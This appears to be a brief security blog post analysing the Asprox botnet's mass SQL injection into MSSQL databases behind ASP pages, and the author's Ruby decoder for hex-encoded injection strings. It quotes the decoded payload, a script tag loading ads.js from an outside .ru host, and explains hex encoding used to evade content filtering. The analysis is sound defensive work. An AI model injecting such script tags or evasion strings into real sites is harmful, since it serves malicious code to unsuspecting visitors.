Mass SQL Injection And Asprox Bot

Asprox is one of the botnet that implements mass sql injection to inject malicious *.js script into MSSQL database server. Normally Asprox bot will search for any vulnerable (sql injection, of course) *.asp script to inject the malicious *.js script and iframe into database. Typical sql injection is similar to log below:

It’s a little bit annoying to decode all the hex chars. It’s obvious that the sql injection input is about to bypass string-based content filtering :). Out of curiosity about this sql injection, i managed to code a little ruby code to decode the sql injection (using normal trick by converting hex input via cast function). Below is the result, sample usage of the code and sample output:

From the output, we knew that attacker try to inject into the database by injecting <script src=http://www.bannert.ru/ads.js>. This script will later on will be used as iframe on the compromised database/web server to silently fetch a ads.js. Unfortunately, the ads.js is no longer available during this blog entry posted.

Below is the simple ruby code for the decoding hex values. Your need to supply input within cast functions.